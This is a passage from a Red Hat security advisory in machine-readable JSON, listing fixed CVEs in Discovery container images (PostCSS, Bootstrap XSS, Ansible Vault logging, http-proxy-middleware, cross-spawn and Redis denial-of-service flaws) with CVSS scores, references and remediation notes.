"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:1249"
},
{
"category": "workaround",
"details": "There\u0027s no known mitigation for this issue. Red Hat recommends to not parse untrusted CSS input using PostCSS.",
"product_ids": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"products": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "PostCSS: Improper input validation in PostCSS"
},
{
"cve": "CVE-2024-6485",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-07-11T17:30:47+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2297388"
}
],
"notes": [
{
"category": "description",
"text": "A vulnerability was found in bootstrap associated with the data-loading-text attribute within the button plugin. This vulnerability allows malicious JavaScript code to be injected into the attribute, which is then executed when the button\u0027s loading state is triggered.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "bootstrap: Cross-Site Scripting via button plugin on bootstrap",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-6485"
},
{
"category": "external",
"summary": "RHBZ#2297388",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2297388"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-6485",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6485"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-6485",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-6485"
},
{
"category": "external",
"summary": "https://www.herodevs.com/vulnerability-directory/cve-2024-6485",
"url": "https://www.herodevs.com/vulnerability-directory/cve-2024-6485"
}
],
"release_date": "2024-07-11T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-02-10T18:38:39+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:1249"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:L/A:L",
"version": "3.1"
},
"products": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "bootstrap: Cross-Site Scripting via button plugin on bootstrap"
},
{
"cve": "CVE-2024-8775",
"cwe": {
"id": "CWE-532",
"name": "Insertion of Sensitive Information into Log File"
},
"discovery_date": "2024-09-13T08:31:27.781000+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2312119"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Ansible, where sensitive information stored in Ansible Vault files can be exposed in plaintext during the execution of a playbook. This occurs when using tasks such as include_vars to load vaulted variables without setting the no_log: true parameter, resulting in sensitive data being printed in the playbook output or logs. This can lead to the unintentional disclosure of secrets like passwords or API keys, compromising security and potentially allowing unauthorized access or actions.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "ansible-core: Exposure of Sensitive Information in Ansible Vault Files Due to Improper Logging",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This issue is classified as moderate rather than important because while it does expose sensitive information during playbook execution, the exposure is limited to logs and output generated during the run, which is typically accessible only to authorized users with sufficient privileges. The flaw does not result in an immediate or direct compromise of systems, as no remote exploitation vector is introduced. Additionally, the risk can be mitigated through proper configuration (`no_log: true`) and access control measures, reducing the likelihood of unauthorized access to the logged data. However, the unintentional disclosure of secrets like passwords or API keys still presents a potential risk for privilege escalation or lateral movement within an environment, justifying a moderate severity rating.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-8775"
},
{
"category": "external",
"summary": "RHBZ#2312119",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2312119"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-8775",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-8775"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-8775",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-8775"
},
{
"category": "external",
"summary": "https://github.com/advisories/GHSA-jpxc-vmjf-9fcj",
"url": "https://github.com/advisories/GHSA-jpxc-vmjf-9fcj"
}
],
"release_date": "2024-09-13T08:35:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-02-10T18:38:39+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:1249"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "ansible-core: Exposure of Sensitive Information in Ansible Vault Files Due to Improper Logging"
},
{
"cve": "CVE-2024-21536",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2024-10-19T06:00:36.846953+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2319884"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the http-proxy-middleware package. Affected versions of this package are vulnerable to denial of service (DoS) due to an UnhandledPromiseRejection error thrown by micromatch. This flaw allows an attacker to kill the Node.js process and crash the server by requesting certain paths.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "http-proxy-middleware: Denial of Service",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-21536"
},
{
"category": "external",
"summary": "RHBZ#2319884",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2319884"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-21536",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21536"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-21536",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21536"
},
{
"category": "external",
"summary": "https://gist.github.com/mhassan1/28be67266d82a53708ed59ce5dc3c94a",
"url": "https://gist.github.com/mhassan1/28be67266d82a53708ed59ce5dc3c94a"
},
{
"category": "external",
"summary": "https://github.com/chimurai/http-proxy-middleware/commit/0b4274e8cc9e9a2c5a06f35fbf456ccfcebc55a5",
"url": "https://github.com/chimurai/http-proxy-middleware/commit/0b4274e8cc9e9a2c5a06f35fbf456ccfcebc55a5"
},
{
"category": "external",
"summary": "https://github.com/chimurai/http-proxy-middleware/commit/788b21e4aff38332d6319557d4a5b1b13b1f9a22",
"url": "https://github.com/chimurai/http-proxy-middleware/commit/788b21e4aff38332d6319557d4a5b1b13b1f9a22"
},
{
"category": "external",
"summary": "https://security.snyk.io/vuln/SNYK-JS-HTTPPROXYMIDDLEWARE-8229906",
"url": "https://security.snyk.io/vuln/SNYK-JS-HTTPPROXYMIDDLEWARE-8229906"
}
],
"release_date": "2024-10-19T05:00:04.056000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-02-10T18:38:39+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:1249"
},
{
"category": "workaround",
"details": "Red Hat Product Security does not have any mitigation recommendations at this time.",
"product_ids": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "http-proxy-middleware: Denial of Service"
},
{
"cve": "CVE-2024-21538",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2024-11-08T13:44:29.182678+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2324550"
}
],
"notes": [
{
"category": "description",
"text": "A Regular Expression Denial of Service (ReDoS) vulnerability was found in the cross-spawn package for Node.js. Due to improper input sanitization, an attacker can increase CPU usage and crash the program with a large, specially crafted string.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "cross-spawn: regular expression denial of service",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-21538"
},
{
"category": "external",
"summary": "RHBZ#2324550",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2324550"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-21538",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21538"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-21538",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21538"
},
{
"category": "external",
"summary": "https://github.com/moxystudio/node-cross-spawn/commit/5ff3a07d9add449021d806e45c4168203aa833ff",
"url": "https://github.com/moxystudio/node-cross-spawn/commit/5ff3a07d9add449021d806e45c4168203aa833ff"
},
{
"category": "external",
"summary": "https://github.com/moxystudio/node-cross-spawn/commit/640d391fde65388548601d95abedccc12943374f",
"url": "https://github.com/moxystudio/node-cross-spawn/commit/640d391fde65388548601d95abedccc12943374f"
},
{
"category": "external",
"summary": "https://github.com/moxystudio/node-cross-spawn/pull/160",
"url": "https://github.com/moxystudio/node-cross-spawn/pull/160"
},
{
"category": "external",
"summary": "https://security.snyk.io/vuln/SNYK-JS-CROSSSPAWN-8303230",
"url": "https://security.snyk.io/vuln/SNYK-JS-CROSSSPAWN-8303230"
}
],
"release_date": "2024-11-08T05:00:04.695000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-02-10T18:38:39+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:1249"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "cross-spawn: regular expression denial of service"
},
{
"cve": "CVE-2024-31228",
"cwe": {
"id": "CWE-674",
"name": "Uncontrolled Recursion"
},
"discovery_date": "2024-10-07T20:01:32.319599+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2317058"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Redis. This flaw allows authenticated users to trigger a denial of service by using specially crafted, long string match patterns on supported commands such as `KEYS`, `SCAN`, `PSUBSCRIBE`, `FUNCTION LIST`, `COMMAND LIST`, and ACL definitions. Matching of extremely long patterns may result in unbounded recursion, leading to stack overflow and process crashes.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "redis: Denial-of-service due to unbounded pattern matching in Redis",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-31228"
},
{
"category": "external",
"summary": "RHBZ#2317058",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2317058"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-31228",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-31228"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-31228",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31228"
},
{
"category": "external",
"summary": "https://github.com/redis/redis/commit/9317bf64659b33166a943ec03d5d9b954e86afb0",
"url": "https://github.com/redis/redis/commit/9317bf64659b33166a943ec03d5d9b954e86afb0"
},
{
"category": "external",
"summary": "https://github.com/redis/redis/security/advisories/GHSA-66gq-c942-6976",
"url": "https://github.com/redis/redis/security/advisories/GHSA-66gq-c942-6976"
}
],
"release_date": "2024-10-07T19:51:06.784000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-02-10T18:38:39+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:1249"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:b41eeb83e5c7ad9937a90ac6247fe5305a7ff90b39ae6a23765e0f2e22bdca70_arm64",
"9Base-discovery-1:discovery/discovery-server-rhel9@sha256:c6488740a778ca3a1aa3dfdc513d4989ac366728d9f93fe8a57a51c562270771_amd64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c5a4ba16f7322e2b89fefa198dc673434f73709a47cf7a85bbccf1ba7a73dd7c_arm64",
"9Base-discovery-1:discovery/discovery-ui-rhel9@sha256:c6f7be7cb58e77958c518fdd68c80a745dcec48fa5397af8c68593254e03743a_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "redis: Denial-of-service due to unbounded pattern matching in Redis"
},
{
"cve": "CVE-2024-31449",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
